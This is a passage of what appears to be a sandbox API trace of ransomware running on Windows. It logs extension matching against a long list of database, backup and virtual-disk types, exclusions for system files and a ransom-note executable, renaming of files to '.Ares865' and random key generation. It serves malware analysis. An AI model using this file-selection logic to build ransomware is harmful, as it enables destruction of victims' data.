lpString2="maq") returned 1 [0060.629] lstrlenW (lpString="mar") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mar") returned 1 [0060.629] lstrlenW (lpString="marshal") returned 7 [0060.629] lstrcmpiW (lpString1="account", lpString2="marshal") returned -1 [0060.629] lstrlenW (lpString="mas") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mas") returned 1 [0060.629] lstrlenW (lpString="mav") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mav") returned 1 [0060.629] lstrlenW (lpString="maw") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="maw") returned 1 [0060.629] lstrlenW (lpString="mdbhtml") returned 7 [0060.629] lstrcmpiW (lpString1="account", lpString2="mdbhtml") returned -1 [0060.629] lstrlenW (lpString="mdn") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mdn") returned 1 [0060.629] lstrlenW (lpString="mdt") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mdt") returned 1 [0060.629] lstrlenW (lpString="mfd") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mfd") returned 1 [0060.629] lstrlenW (lpString="mpd") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mpd") returned 1 [0060.629] lstrlenW (lpString="mrg") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mrg") returned 1 [0060.629] lstrlenW (lpString="mud") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="mud") returned 1 [0060.630] lstrlenW (lpString="mwb") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="mwb") returned 1 [0060.630] lstrlenW (lpString="myd") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="myd") returned 1 [0060.630] lstrlenW (lpString="ndf") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="ndf") returned 1 [0060.630] lstrlenW (lpString="nnt") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="nnt") returned 1 [0060.630] lstrlenW (lpString="nrmlib") returned 6 [0060.630] lstrcmpiW (lpString1="ccount", lpString2="nrmlib") returned -1 [0060.630] lstrlenW (lpString="ns2") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="ns2") returned 1 [0060.630] lstrlenW (lpString="ns3") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="ns3") returned 1 [0060.630] lstrlenW (lpString="ns4") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="ns4") returned 1 [0060.630] lstrlenW (lpString="nsf") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="nsf") returned 1 [0060.630] lstrlenW (lpString="nv") returned 2 [0060.630] lstrcmpiW (lpString1="nt", lpString2="nv") returned -1 [0060.630] lstrlenW (lpString="nv2") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="nv2") returned 1 [0060.630] lstrlenW (lpString="nwdb") returned 4 [0060.630] lstrcmpiW (lpString1="ount", lpString2="nwdb") returned 1 [0060.630] lstrlenW (lpString="nyf") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="nyf") returned 1 [0060.630] lstrlenW (lpString="odb") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.630] lstrlenW (lpString="odb") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.630] lstrlenW (lpString="oqy") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="oqy") returned 1 [0060.630] lstrlenW (lpString="ora") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="ora") returned 1 [0060.630] lstrlenW (lpString="orx") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="orx") returned 1 [0060.630] lstrlenW (lpString="owc") returned 3 [0060.630] lstrcmpiW (lpString1="unt", lpString2="owc") returned 1 [0060.631] lstrlenW (lpString="p96") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="p96") returned 1 [0060.631] lstrlenW (lpString="p97") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="p97") returned 1 [0060.631] lstrlenW (lpString="pan") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="pan") returned 1 [0060.631] lstrlenW (lpString="pdb") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="pdb") returned 1 [0060.631] lstrlenW (lpString="pdm") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="pdm") returned 1 [0060.631] lstrlenW (lpString="pnz") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="pnz") returned 1 [0060.631] lstrlenW (lpString="qry") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="qry") returned 1 [0060.631] lstrlenW (lpString="qvd") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="qvd") returned 1 [0060.631] lstrlenW (lpString="rbf") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="rbf") returned 1 [0060.631] lstrlenW (lpString="rctd") returned 4 [0060.631] lstrcmpiW (lpString1="ount", lpString2="rctd") returned -1 [0060.631] lstrlenW (lpString="rod") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="rod") returned 1 [0060.631] lstrlenW (lpString="rodx") returned 4 [0060.631] lstrcmpiW (lpString1="ount", lpString2="rodx") returned -1 [0060.631] lstrlenW (lpString="rpd") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="rpd") returned 1 [0060.631] lstrlenW (lpString="rsd") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="rsd") returned 1 [0060.631] lstrlenW (lpString="sas7bdat") returned 8 [0060.631] lstrcmpiW (lpString1="eaccount", lpString2="sas7bdat") returned -1 [0060.631] lstrlenW (lpString="sbf") returned 3 [0060.631] lstrcmpiW (lpString1="unt", lpString2="sbf") returned 1 [0060.631] lstrlenW (lpString="scx") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="scx") returned 1 [0060.632] lstrlenW (lpString="sdb") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="sdb") returned 1 [0060.632] lstrlenW (lpString="sdc") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="sdc") returned 1 [0060.632] lstrlenW (lpString="sdf") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="sdf") returned 1 [0060.632] lstrlenW (lpString="sis") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="sis") returned 1 [0060.632] lstrlenW (lpString="spq") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="spq") returned 1 [0060.632] lstrlenW (lpString="te") returned 2 [0060.632] lstrcmpiW (lpString1="nt", lpString2="te") returned -1 [0060.632] lstrlenW (lpString="teacher") returned 7 [0060.632] lstrcmpiW (lpString1="account", lpString2="teacher") returned -1 [0060.632] lstrlenW (lpString="tmd") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="tmd") returned 1 [0060.632] lstrlenW (lpString="tps") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="tps") returned 1 [0060.632] lstrlenW (lpString="trc") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.632] lstrlenW (lpString="trc") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.632] lstrlenW (lpString="trm") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="trm") returned 1 [0060.632] lstrlenW (lpString="udb") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="udb") returned 1 [0060.632] lstrlenW (lpString="udl") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="udl") returned 1 [0060.632] lstrlenW (lpString="usr") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="usr") returned -1 [0060.632] lstrlenW (lpString="v12") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="v12") returned -1 [0060.632] lstrlenW (lpString="vis") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="vis") returned -1 [0060.632] lstrlenW (lpString="vpd") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="vpd") returned -1 [0060.632] lstrlenW (lpString="vvv") returned 3 [0060.632] lstrcmpiW (lpString1="unt", lpString2="vvv") returned -1 [0060.633] lstrlenW (lpString="wdb") returned 3 [0060.633] lstrcmpiW (lpString1="unt", lpString2="wdb") returned -1 [0060.633] lstrlenW (lpString="wmdb") returned 4 [0060.633] lstrcmpiW (lpString1="ount", lpString2="wmdb") returned -1 [0060.633] lstrlenW (lpString="wrk") returned 3 [0060.633] lstrcmpiW (lpString1="unt", lpString2="wrk") returned -1 [0060.633] lstrlenW (lpString="xdb") returned 3 [0060.633] lstrcmpiW (lpString1="unt", lpString2="xdb") returned -1 [0060.633] lstrlenW (lpString="xld") returned 3 [0060.633] lstrcmpiW (lpString1="unt", lpString2="xld") returned -1 [0060.633] lstrlenW (lpString="xmlff") returned 5 [0060.633] lstrcmpiW (lpString1="count", lpString2="xmlff") returned -1 [0060.633] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865") returned 123 [0060.633] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0060.634] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.634] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1736) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.634] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.635] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.635] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.635] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d0, lpName=0x0) returned 0x164 [0060.637] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d0) returned 0x190000 [0060.638] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.638] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.638] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.639] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.639] CloseHandle (hObject=0x164) returned 1 [0060.639] CloseHandle (hObject=0x15c) returned 1 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.639] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="aoldtz.exe") returned 1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2=".") returned 1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="..") returned 1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="windows") returned -1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="bootmgr") returned -1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="temp") returned -1 [0060.639] lstrcmpiW (lpString1="Backup", lpString2="pagefile.sys") returned -1 [0060.640] lstrcmpiW (lpString1="Backup", lpString2="boot") returned -1 [0060.640] lstrcmpiW (lpString1="Backup", lpString2="ids.txt") returned -1 [0060.640] lstrcmpiW (lpString1="Backup", lpString2="ntuser.dat") returned -1 [0060.640] lstrcmpiW (lpString1="Backup", lpString2="perflogs") returned -1 [0060.640] lstrcmpiW (lpString1="Backup", lpString2="MSBuild") returned -1 [0060.640] lstrlenW (lpString="Backup") returned 6 [0060.640] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 115 [0060.640] lstrcpyW (in: lpString1=0x2cce478, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0060.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0060.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e9e20 [0060.640] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d2268 [0060.640] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7bc3a13, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="aoldtz.exe") returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2=".") returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="..") returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="windows") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="bootmgr") returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="temp") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="pagefile.sys") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="boot") returned 1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="ids.txt") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="ntuser.dat") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="perflogs") returned -1 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2="MSBuild") returned -1 [0060.640] lstrlenW (lpString="edb.chk") returned 7 [0060.640] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned 66 [0060.640] lstrcpyW (in: lpString1=0x2cce478, lpString2="edb.chk" | out: lpString1="edb.chk") returned="edb.chk" [0060.640] lstrlenW (lpString="edb.chk") returned 7 [0060.640] lstrlenW (lpString="Ares865") returned 7 [0060.640] lstrlenW (lpString=".dll") returned 4 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2=".dll") returned 1 [0060.640] lstrlenW (lpString=".lnk") returned 4 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2=".lnk") returned 1 [0060.640] lstrlenW (lpString=".ini") returned 4 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2=".ini") returned 1 [0060.640] lstrlenW (lpString=".sys") returned 4 [0060.640] lstrcmpiW (lpString1="edb.chk", lpString2=".sys") returned 1 [0060.641] lstrlenW (lpString="edb.chk") returned 7 [0060.641] lstrlenW (lpString="bak") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="bak") returned 1 [0060.641] lstrlenW (lpString="ba_") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="ba_") returned 1 [0060.641] lstrlenW (lpString="dbb") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="dbb") returned -1 [0060.641] lstrlenW (lpString="vmdk") returned 4 [0060.641] lstrcmpiW (lpString1=".chk", lpString2="vmdk") returned -1 [0060.641] lstrlenW (lpString="rar") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="rar") returned -1 [0060.641] lstrlenW (lpString="zip") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="zip") returned -1 [0060.641] lstrlenW (lpString="tgz") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="tgz") returned -1 [0060.641] lstrlenW (lpString="vbox") returned 4 [0060.641] lstrcmpiW (lpString1=".chk", lpString2="vbox") returned -1 [0060.641] lstrlenW (lpString="vdi") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="vdi") returned -1 [0060.641] lstrlenW (lpString="vhd") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="vhd") returned -1 [0060.641] lstrlenW (lpString="vhdx") returned 4 [0060.641] lstrcmpiW (lpString1=".chk", lpString2="vhdx") returned -1 [0060.641] lstrlenW (lpString="avhd") returned 4 [0060.641] lstrcmpiW (lpString1=".chk", lpString2="avhd") returned -1 [0060.641] lstrlenW (lpString="db") returned 2 [0060.641] lstrcmpiW (lpString1="hk", lpString2="db") returned 1 [0060.641] lstrlenW (lpString="db2") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="db2") returned -1 [0060.641] lstrlenW (lpString="db3") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="db3") returned -1 [0060.641] lstrlenW (lpString="dbf") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="dbf") returned -1 [0060.641] lstrlenW (lpString="mdf") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="mdf") returned -1 [0060.641] lstrlenW (lpString="mdb") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="mdb") returned -1 [0060.641] lstrlenW (lpString="sql") returned 3 [0060.641] lstrcmpiW (lpString1="chk", lpString2="sql") returned -1 [0060.642] lstrlenW (lpString="sqlite") returned 6 [0060.642] lstrcmpiW (lpString1="db.chk", lpString2="sqlite") returned -1 [0060.642] lstrlenW (lpString="sqlite3") returned 7 [0060.642] lstrlenW (lpString="sqlitedb") returned 8 [0060.642] lstrlenW (lpString="xml") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="xml") returned -1 [0060.642] lstrlenW (lpString="$er") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="$er") returned 1 [0060.642] lstrlenW (lpString="4dd") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="4dd") returned 1 [0060.642] lstrlenW (lpString="4dl") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="4dl") returned 1 [0060.642] lstrlenW (lpString="^^^") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="^^^") returned 1 [0060.642] lstrlenW (lpString="abs") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="abs") returned 1 [0060.642] lstrlenW (lpString="abx") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="abx") returned 1 [0060.642] lstrlenW (lpString="accdb") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accdb") returned 1 [0060.642] lstrlenW (lpString="accdc") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accdc") returned 1 [0060.642] lstrlenW (lpString="accde") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accde") returned 1 [0060.642] lstrlenW (lpString="accdr") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accdr") returned 1 [0060.642] lstrlenW (lpString="accdt") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accdt") returned 1 [0060.642] lstrlenW (lpString="accdw") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accdw") returned 1 [0060.642] lstrlenW (lpString="accft") returned 5 [0060.642] lstrcmpiW (lpString1="b.chk", lpString2="accft") returned 1 [0060.642] lstrlenW (lpString="adb") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="adb") returned 1 [0060.642] lstrlenW (lpString="adb") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="adb") returned 1 [0060.642] lstrlenW (lpString="ade") returned 3 [0060.642] lstrcmpiW (lpString1="chk", lpString2="ade") returned 1 [0060.643] lstrlenW (lpString="adf") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="adf") returned 1 [0060.643] lstrlenW (lpString="adn") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="adn") returned 1 [0060.643] lstrlenW (lpString="adp") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="adp") returned 1 [0060.643] lstrlenW (lpString="alf") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="alf") returned 1 [0060.643] lstrlenW (lpString="ask") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="ask") returned 1 [0060.643] lstrlenW (lpString="btr") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="btr") returned 1 [0060.643] lstrlenW (lpString="cat") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="cat") returned 1 [0060.643] lstrlenW (lpString="cdb") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="cdb") returned 1 [0060.643] lstrlenW (lpString="ckp") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="ckp") returned -1 [0060.643] lstrlenW (lpString="cma") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="cma") returned -1 [0060.643] lstrlenW (lpString="cpd") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="cpd") returned -1 [0060.643] lstrlenW (lpString="dacpac") returned 6 [0060.643] lstrcmpiW (lpString1="db.chk", lpString2="dacpac") returned 1 [0060.643] lstrlenW (lpString="dad") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="dad") returned -1 [0060.643] lstrlenW (lpString="dadiagrams") returned 10 [0060.643] lstrlenW (lpString="daschema") returned 8 [0060.643] lstrlenW (lpString="db-journal") returned 10 [0060.643] lstrlenW (lpString="db-shm") returned 6 [0060.643] lstrcmpiW (lpString1="db.chk", lpString2="db-shm") returned -1 [0060.643] lstrlenW (lpString="db-wal") returned 6 [0060.643] lstrcmpiW (lpString1="db.chk", lpString2="db-wal") returned -1 [0060.643] lstrlenW (lpString="dbc") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="dbc") returned -1 [0060.643] lstrlenW (lpString="dbs") returned 3 [0060.643] lstrcmpiW (lpString1="chk", lpString2="dbs") returned -1 [0060.643] lstrlenW (lpString="dbt") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dbt") returned -1 [0060.644] lstrlenW (lpString="dbv") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dbv") returned -1 [0060.644] lstrlenW (lpString="dbx") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dbx") returned -1 [0060.644] lstrlenW (lpString="dcb") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dcb") returned -1 [0060.644] lstrlenW (lpString="dct") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dct") returned -1 [0060.644] lstrlenW (lpString="dcx") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dcx") returned -1 [0060.644] lstrlenW (lpString="ddl") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="ddl") returned -1 [0060.644] lstrlenW (lpString="dlis") returned 4 [0060.644] lstrcmpiW (lpString1=".chk", lpString2="dlis") returned -1 [0060.644] lstrlenW (lpString="dp1") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dp1") returned -1 [0060.644] lstrlenW (lpString="dqy") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dqy") returned -1 [0060.644] lstrlenW (lpString="dsk") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dsk") returned -1 [0060.644] lstrlenW (lpString="dsn") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dsn") returned -1 [0060.644] lstrlenW (lpString="dtsx") returned 4 [0060.644] lstrcmpiW (lpString1=".chk", lpString2="dtsx") returned -1 [0060.644] lstrlenW (lpString="dxl") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="dxl") returned -1 [0060.644] lstrlenW (lpString="eco") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="eco") returned -1 [0060.644] lstrlenW (lpString="ecx") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="ecx") returned -1 [0060.644] lstrlenW (lpString="edb") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="edb") returned -1 [0060.644] lstrlenW (lpString="epim") returned 4 [0060.644] lstrcmpiW (lpString1=".chk", lpString2="epim") returned -1 [0060.644] lstrlenW (lpString="fcd") returned 3 [0060.644] lstrcmpiW (lpString1="chk", lpString2="fcd") returned -1 [0060.645] lstrlenW (lpString="fdb") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fdb") returned -1 [0060.645] lstrlenW (lpString="fic") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fic") returned -1 [0060.645] lstrlenW (lpString="flexolibrary") returned 12 [0060.645] lstrlenW (lpString="fm5") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fm5") returned -1 [0060.645] lstrlenW (lpString="fmp") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fmp") returned -1 [0060.645] lstrlenW (lpString="fmp12") returned 5 [0060.645] lstrcmpiW (lpString1="b.chk", lpString2="fmp12") returned -1 [0060.645] lstrlenW (lpString="fmpsl") returned 5 [0060.645] lstrcmpiW (lpString1="b.chk", lpString2="fmpsl") returned -1 [0060.645] lstrlenW (lpString="fol") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fol") returned -1 [0060.645] lstrlenW (lpString="fp3") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fp3") returned -1 [0060.645] lstrlenW (lpString="fp4") returned 3 [0060.645] lstrcmpiW (lpString1="chk", 